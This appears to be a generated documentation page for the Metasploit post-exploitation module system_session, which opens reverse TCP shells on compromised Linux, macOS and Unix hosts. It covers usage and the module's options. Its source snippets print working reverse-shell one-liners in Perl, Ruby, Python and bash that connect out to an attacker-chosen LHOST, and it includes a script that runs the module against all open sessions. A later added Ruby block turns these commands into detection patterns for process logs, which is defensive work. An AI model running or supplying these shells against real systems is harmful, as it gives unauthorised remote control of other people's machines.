Multi Manage System Remote TCP Shell Session - Metasploit


This page contains detailed information about how to use the post/multi/manage/system_session Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Multi Manage System Remote TCP Shell Session
Module: post/multi/manage/system_session
Source code: modules/post/multi/manage/system_session.rb
Disclosure date: -
Last modification time: 2017-09-22 13:38:06 +0000
Supported architecture(s): -
Supported platform(s): Linux, OSX, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will create a Reverse TCP Shell on the target system using the system's own scripting environments installed on the target.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/manage/system_session

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/manage/system_session
msf post(system_session) > show options
    ... show and set options ...
msf post(system_session) > set SESSION session-id
msf post(system_session) > exploit

If you wish to run the post module against all sessions from the framework, here is how:

1 - Create the following resource script:


<ruby>
# Run the post module once for every open session
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/manage/system_session")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

  • LHOST: IP of host that will receive the connection from the payload.


Msfconsole Usage


Here is how the multi/manage/system_session post exploitation module looks in the msfconsole:

msf6 > use post/multi/manage/system_session

msf6 post(multi/manage/system_session) > show info

       Name: Multi Manage System Remote TCP Shell Session
     Module: post/multi/manage/system_session
   Platform: Linux, OSX, Unix
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <carlos_perez[at]darkoperator.com>

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  HANDLER  false            yes       Start an exploit/multi/handler to receive the connection
  LHOST                     yes       IP of host that will receive the connection from the payload.
  LPORT    4433             no        Port for Payload to connect to.
  SESSION                   yes       The session to run this module on.
  TYPE     auto             yes       Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)

Description:
  This module will create a Reverse TCP Shell on the target system 
  using the system's own scripting environments installed on the 
  target.

Module Options


This is a complete list of options available in the multi/manage/system_session post exploitation module:

msf6 post(multi/manage/system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an exploit/multi/handler to receive the connection
   LHOST                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (Accepted: auto, ruby, python, perl, bash)

Advanced Options


Here is a complete list of advanced options supported by the multi/manage/system_session post exploitation module:

msf6 post(multi/manage/system_session) > show advanced

Module advanced options (post/multi/manage/system_session):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the multi/manage/system_session module can do:

msf6 post(multi/manage/system_session) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the multi/manage/system_session post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/manage/system_session) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages. For each one, the code snippet from the module source that emits it is shown below; reading it often helps identify the root cause of the problem.

No scripting environment found with which to create a remote reverse TCP Shell with.


Here is a relevant code snippet related to the "No scripting environment found with which to create a remote reverse TCP Shell with." error message:

    elsif cmd_exec("bash --version") =~ /GNU bash/
      print_status("Bash was found on target")
      cmd = bash_session(lhost,lport)
      vprint_status("Running #{cmd}")
    else
      print_error("No scripting environment found with which to create a remote reverse TCP Shell with.")
    end

    return cmd
  end

Job <CURRENT_ID> is listening on IP <CURRENT_LHOST> and port <CURRENT_LPORT>


Here is a relevant code snippet related to the "Job <CURRENT_ID> is listening on IP <CURRENT_LHOST> and port <CURRENT_LPORT>" error message:

      if j.name =~ / multi\/handler/
        current_id = j.jid
        current_lhost = j.ctx[0].datastore["LHOST"]
        current_lport = j.ctx[0].datastore["LPORT"]
        if lhost == current_lhost and lport == current_lport.to_i
          print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")
          conflict = true
        end
      end
    end
    return conflict

Could not start handler!


Here is a relevant code snippet related to the "Could not start handler!" error message:

          'LocalInput'  => self.user_input,
          'LocalOutput' => self.user_output,
          'RunAsJob'    => true
        )
    else
      print_error("Could not start handler!")
      print_error("A job is listening on the same Port")
    end
  end

  # Perl reverse TCP Shell

A job is listening on the same Port


Here is a relevant code snippet related to the "A job is listening on the same Port" error message:

          'LocalOutput' => self.user_output,
          'RunAsJob'    => true
        )
    else
      print_error("Could not start handler!")
      print_error("A job is listening on the same Port")
    end
  end

  # Perl reverse TCP Shell
  def perl_session(lhost,lport)

No scripting environment found for the selected type.


Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:

    if cmd_exec("perl -v") =~ /Larry/
      print_status("Perl reverse shell selected")
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
        "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
    else
      print_error("No scripting environment found for the selected type.")
      cmd =""
    end
    return cmd
  end

No scripting environment found for the selected type.


Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:

    if cmd_exec("ruby -v") =~ /revision/i
      print_status("Ruby reverse shell selected")
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
        "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
    else
      print_error("No scripting environment found for the selected type.")
      cmd =""
    end
    return cmd
  end

No scripting environment found for the selected type.


Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:

      print_status("Python reverse shell selected")
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
        "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
        "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
    else
      print_error("No scripting environment found for the selected type.")
      cmd =""
    end
    return cmd
  end

No scripting environment found for the selected type.


Here is a relevant code snippet related to the "No scripting environment found for the selected type." error message:

  def bash_session(lhost,lport)
    if cmd_exec("bash --version") =~ /GNU bash/
      print_status("Bash reverse shell selected")
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"
    else
      print_error("No scripting environment found for the selected type.")
      cmd =""
    end
    return cmd
  end
end
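
The four command templates in the snippets above leave recognizable process command lines on the target host. As an added example (not part of the module source or the original page), the following Ruby code flags such command lines in process-execution records and extracts the callback destination; the "timestamp | host | user | cmdline" log format, the sample records and all function names are assumptions.

```ruby
# Added example: flag process command lines shaped like the four command
# templates quoted on this page and pull out the callback destination.
# The log format, field order and all names here are assumptions.
DEFAULT_LPORT = 4433 # default LPORT shown in the module options above

SIGNATURES = {
  perl:   /\bperl\b.*-MIO\b.*IO::Socket::INET.*PeerAddr,"(?<host>[^":]+):(?<port>\d+)"/,
  ruby:   /\bruby\b.*-rsocket\b.*TCPSocket\.new\("(?<host>[^"]+)","(?<port>\d+)"\)/,
  python: /\bpython[\d.]*\b.*socket\.socket.*\.connect\(\("(?<host>[^"]+)",(?<port>\d+)\)\).*os\.dup2/,
  bash:   %r{\bbash\b.*-i\b.*/dev/tcp/(?<host>[^/\s]+)/(?<port>\d+)}
}.freeze

# Return a hash describing the match, or nil if nothing matched.
def classify(cmdline)
  SIGNATURES.each do |type, re|
    m = re.match(cmdline)
    next unless m
    port = m[:port].to_i
    return { type: type, dest_host: m[:host], dest_port: port,
             default_lport: port == DEFAULT_LPORT }
  end
  nil
end

# Parse "timestamp | host | user | cmdline" records and keep only the hits.
def scan(log_text)
  log_text.each_line.map do |line|
    ts, host, user, cmdline = line.chomp.split(" | ", 4)
    hit = cmdline && classify(cmdline)
    hit && hit.merge(ts: ts, source: host, user: user)
  end.compact
end

# Constructed sample records (documentation-range address, not real data).
SAMPLE_LOG = <<~'LOG'
  2024-05-01T10:00:01Z | web01 | www-data | bash -c nohup bash -i >& /dev/tcp/192.0.2.10/4433 0>&1
  2024-05-01T10:00:07Z | web01 | deploy | python3 -c import json,sys;print(json.load(sys.stdin)["version"])
  2024-05-01T10:02:13Z | db02 | postgres | python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  2024-05-01T10:03:40Z | db02 | admin | bash -i
LOG

scan(SAMPLE_LOG).each { |h| puts h }
```

The patterns cover only the unmodified templates quoted above, so a hit is high-confidence while a miss is inconclusive. The default_lport field marks hits that use the module's default LPORT of 4433.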



Authors


  • Carlos Perez <carlos_perez[at]darkoperator.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
